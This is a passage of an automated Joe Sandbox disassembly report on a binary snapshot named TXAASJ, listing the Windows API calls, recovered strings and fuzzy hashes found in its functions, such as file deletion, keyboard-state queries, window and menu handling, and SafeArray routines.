                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E9CC4B
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E9CC5D
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 152968663-0
                                                                                                                        • Opcode ID: 8757b93ce577116a8d47fcb0793c29c49e6d3679db4af9f56166198a359d866a
                                                                                                                        • Instruction ID: 406bb0866b911e4308fc852e1575935156a8316429f87cc6642e5784c1306741
                                                                                                                        • Opcode Fuzzy Hash: 8757b93ce577116a8d47fcb0793c29c49e6d3679db4af9f56166198a359d866a
                                                                                                                        • Instruction Fuzzy Hash: 62C12BB1900129AECF10EFA5CC81ADEBBB9EF49314F1050AAB609F6151D7709A84CF65
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3566271842-0
                                                                                                                        • Opcode ID: 06c0fd356a70a06d7b5c74608861ccbcb35428cf8fdf8a84c5a56afa05a0997b
                                                                                                                        • Instruction ID: 4b028142f17ab15a56cc0cc669088c8d7ab62675973fe46129653f0a017a581c
                                                                                                                        • Opcode Fuzzy Hash: 06c0fd356a70a06d7b5c74608861ccbcb35428cf8fdf8a84c5a56afa05a0997b
                                                                                                                        • Instruction Fuzzy Hash: B2712B75A00219AFDB10DFA4C984ADEB7F8EF49314F049496E919FB252D730AE45CF90
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00E93908
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00E93973
                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00E93993
                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00E939AA
                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00E939D9
                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00E939EA
                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00E93A16
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00E93A24
                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00E93A4D
                                                                                                                        • GetKeyState.USER32(00000012), ref: 00E93A5B
                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00E93A84
                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00E93A92
                                                                                                                        Similarity
                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541375521-0
                                                                                                                        • Opcode ID: b1fabd18356f6b4884eada49436abca9a571979cf8fa2d1d42818acaaf95b89b
                                                                                                                        • Instruction ID: eeab9d52537d80a1660d454bf666a29ee921f12e8e2ae429235ec0012ac24a8d
                                                                                                                        • Opcode Fuzzy Hash: b1fabd18356f6b4884eada49436abca9a571979cf8fa2d1d42818acaaf95b89b
                                                                                                                        • Instruction Fuzzy Hash: DF51A860A047846DFF35EBB488117EAAFF49F02748F08559AD5C2761C2DA949B8CC761
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00E8FB19
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00E8FB2B
                                                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E8FB89
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00E8FB94
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00E8FBA6
                                                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E8FBFC
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E8FC0A
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00E8FC1B
                                                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E8FC5E
                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00E8FC6C
                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E8FC89
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00E8FC96
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3096461208-0
                                                                                                                        • Opcode ID: 3386785cef622f57e0ee2c43984847a1ef7207f7d5fd44cf134b9b800129f334
                                                                                                                        • Instruction ID: 82a38f1b6a493a25dbe1aa1577baa5e41b12776daebfe5bf62dd5edd92440602
                                                                                                                        • Opcode Fuzzy Hash: 3386785cef622f57e0ee2c43984847a1ef7207f7d5fd44cf134b9b800129f334
                                                                                                                        • Instruction Fuzzy Hash: D3514371B00205AFDB08DF69DD95AAEBBB9EB88315F14813DF919E7290D770DE048B10
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E549CA: InvalidateRect.USER32(?,00000000,00000001), ref: 00E54A23
                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E6B85B), ref: 00E6B926
                                                                                                                        • KillTimer.USER32(00000000,?,?,?,?,00E6B85B,00000000,?,?,00E6AF1E,?,?), ref: 00E6B9BD
                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00ECE775
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,00E6B85B,00000000,?,?,00E6AF1E,?,?), ref: 00ECE7A6
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,00E6B85B,00000000,?,?,00E6AF1E,?,?), ref: 00ECE7BD
                                                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,00E6B85B,00000000,?,?,00E6AF1E,?,?), ref: 00ECE7D9
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00ECE7EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 641708696-0
                                                                                                                        • Opcode ID: 2f6add916173112e119d3670cbb821f6ae3985c6b26fde60275e3772a393453a
                                                                                                                        • Instruction ID: 1a6772ba6e1ef7e42caa9a54edb2072ff16f90f381e560095c92c3892c50e6ae
                                                                                                                        • Opcode Fuzzy Hash: 2f6add916173112e119d3670cbb821f6ae3985c6b26fde60275e3772a393453a
                                                                                                                        • Instruction Fuzzy Hash: D261EC31140705CFDB259F29E988BA5B7F5FF8036AF14A51EE282A7660C731A8C6DB40
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6B155: GetWindowLongW.USER32(?,000000EB), ref: 00E6B166
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00E6B067
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ColorLongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 259745315-0
                                                                                                                        • Opcode ID: 3b0a970b41c260b0f3ab33dbda9fba83fced029f83df51d090820830676aaca9
                                                                                                                        • Instruction ID: db096d0687576330f99d77d7ab6811bcf5f8c94470d0ee29e300c7f364da9fa0
                                                                                                                        • Opcode Fuzzy Hash: 3b0a970b41c260b0f3ab33dbda9fba83fced029f83df51d090820830676aaca9
                                                                                                                        • Instruction Fuzzy Hash: EA41D031185500EFDB205F28EC98BBA3B65EB06774F145265FD65EA1E6C7328C82DB21
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 136442275-0
                                                                                                                        • Opcode ID: 5637a86697bcb739ca9cf099e223347e769e46577a9fc699e1ee7dd8c4f27331
                                                                                                                        • Instruction ID: b75c51239bbca0747ba925bbed1e530df445aa0797e7c092169d2990ce2bf37e
                                                                                                                        • Opcode Fuzzy Hash: 5637a86697bcb739ca9cf099e223347e769e46577a9fc699e1ee7dd8c4f27331
                                                                                                                        • Instruction Fuzzy Hash: D141007280422CAADF21EB54CC41EDE73FCAB48310F0091E6F619B2041EA719BD9CF60
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(00EEDBF0,00EEDBF0,00EEDBF0), ref: 00E9E062
                                                                                                                        • GetDriveTypeW.KERNEL32(?,00F03AE4,00000061), ref: 00E9E12C
                                                                                                                        • _wcscpy.LIBCMT ref: 00E9E156
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                        • API String ID: 2820617543-1000479233
                                                                                                                        • Opcode ID: fb47d7469eb20c7fb925e169e2d4a6098484036a638287edca841be6691a01eb
                                                                                                                        • Instruction ID: 0bd1790d1fa37959ae8d8db9f804bc584a1351df123406b0ae678cb5e72727ad
                                                                                                                        • Opcode Fuzzy Hash: fb47d7469eb20c7fb925e169e2d4a6098484036a638287edca841be6691a01eb
                                                                                                                        • Instruction Fuzzy Hash: B851C335144300AFCB14EF14D891AAAB7E5EF84354F14982DFAA6772A2DB71DE09CB42
                                                                                                                        APIs
                                                                                                                        • __swprintf.LIBCMT ref: 00E584E5
                                                                                                                        • __itow.LIBCMT ref: 00E58519
                                                                                                                          • Part of subcall function 00E72177: _xtow@16.LIBCMT ref: 00E72198
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                                        • API String ID: 1502193981-2263619337
                                                                                                                        • Opcode ID: 3abb9441cf7a20519e70348656e503400267b8b84d62a1af12689b15d22ca4e9
                                                                                                                        • Instruction ID: 4295844710967be596c0b17b7674953eab84161cee73e1eff0d8bb25fd47bbfa
                                                                                                                        • Opcode Fuzzy Hash: 3abb9441cf7a20519e70348656e503400267b8b84d62a1af12689b15d22ca4e9
                                                                                                                        • Instruction Fuzzy Hash: D5414A32600605DBDB24DB38D941F7A73E5BF44301F20585EE95AF7281EE32EA46CB11
                                                                                                                        APIs
                                                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EBA067
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00EBA06E
                                                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EBA081
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EBA089
                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EBA094
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00EBA09D
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00EBA0A7
                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EBA0BB
                                                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EBA0C7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 2559357485-2160076837
                                                                                                                        • Opcode ID: aab045e4a19a9e05b81a1d678f70ac53659506162729355cf5910b920786b24c
                                                                                                                        • Instruction ID: ff1980309f5191522cb08e16d3e7aaa7d704b0044657cf83762f5d6078ac643a
                                                                                                                        • Opcode Fuzzy Hash: aab045e4a19a9e05b81a1d678f70ac53659506162729355cf5910b920786b24c
                                                                                                                        • Instruction Fuzzy Hash: E131BE31105215AFDF21AF65EC09FEB3B69FF09364F140225FA25B20A0D731D824DBA1
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E75CCA
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00E75D63
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00E75D99
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00E75DB6
                                                                                                                        • __allrem.LIBCMT ref: 00E75E0C
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E75E28
                                                                                                                        • __allrem.LIBCMT ref: 00E75E3F
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E75E5D
                                                                                                                        • __allrem.LIBCMT ref: 00E75E74
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E75E92
                                                                                                                        • __invoke_watson.LIBCMT ref: 00E75F03
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 384356119-0
                                                                                                                        • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                        • Instruction ID: f082f2dde2e24b620e2a3a6cf3fcb900d0e5f30c8a61d4e2f69644c7e59ca516
                                                                                                                        • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                        • Instruction Fuzzy Hash: F1719973A01B16ABD714AE79CC41B9AB3E4EF14764F14913AF51CF7681E7B0DA408B90
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E95816
                                                                                                                        • GetMenuItemInfoW.USER32(00F118F0,000000FF,00000000,00000030), ref: 00E95877
                                                                                                                        • SetMenuItemInfoW.USER32(00F118F0,00000004,00000000,00000030), ref: 00E958AD
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00E958BF
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00E95903
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00E9591F
                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00E95949
                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00E9598E
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E959D4
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E959E8
                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E95A09
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4176008265-0
                                                                                                                        • Opcode ID: 08b17ee5bd8e8067b20b7c6d94053d5d3b045adda889198c33e8baeff85947c7
                                                                                                                        • Instruction ID: 73740f8ea43fb657c4c703997f5003e0813de5e0d7f24e1d3d93066d9116e200
                                                                                                                        • Opcode Fuzzy Hash: 08b17ee5bd8e8067b20b7c6d94053d5d3b045adda889198c33e8baeff85947c7
                                                                                                                        • Instruction Fuzzy Hash: 9661CE72900649EFEF12CFA4EC88AEE7BB8EB45318F14155AE852B7251D371AD05CB20
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EB9AA5
                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EB9AA8
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EB9ACC
                                                                                                                        • _memset.LIBCMT ref: 00EB9ADD
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EB9AEF
                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EB9B67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 830647256-0
                                                                                                                        • Opcode ID: 1084d40e4a8f9a4c9db6238042a1ed4c3c69906c8782f2e8a6a827017fdbf04f
                                                                                                                        • Instruction ID: 5ade5518dd255ce6830f295ed0236921ed39ebc5022e395b68e2a5353449e906
                                                                                                                        • Opcode Fuzzy Hash: 1084d40e4a8f9a4c9db6238042a1ed4c3c69906c8782f2e8a6a827017fdbf04f
                                                                                                                        • Instruction Fuzzy Hash: 1A615C75A00208AFDB11DFA8CC81EEEB7F8EF09714F104159FA15E72A2D770A945DB50
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00E93591
                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00E93612
                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00E9362D
                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00E93647
                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00E9365C
                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00E93674
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00E93686
                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00E9369E
                                                                                                                        • GetKeyState.USER32(00000012), ref: 00E936B0
                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00E936C8
                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00E936DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541375521-0
                                                                                                                        • Opcode ID: 21958888117a8612825a5b8172c4d804f02b87e132c6ada3969d2af21487a6ee
                                                                                                                        • Instruction ID: d14509caaffefa0eb709341d8a4cc30902240c5d89c85deeb744e9d72671b3cd
                                                                                                                        • Opcode Fuzzy Hash: 21958888117a8612825a5b8172c4d804f02b87e132c6ada3969d2af21487a6ee
                                                                                                                        • Instruction Fuzzy Hash: 1541D4745087C97DFF30D77498143A5BEA1AB1534CF08A05AD5C6663C3EBA49BC8CBA2
                                                                                                                        APIs
                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00E8A2AA
                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00E8A2F5
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00E8A307
                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E8A327
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00E8A36A
                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E8A37E
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E8A393
                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00E8A3A0
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E8A3A9
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E8A3BB
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E8A3C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706829360-0
                                                                                                                        • Opcode ID: 9d308b88815d4ecd82f040c5131814dccbc4733c884eef1b353212df88f7ac15
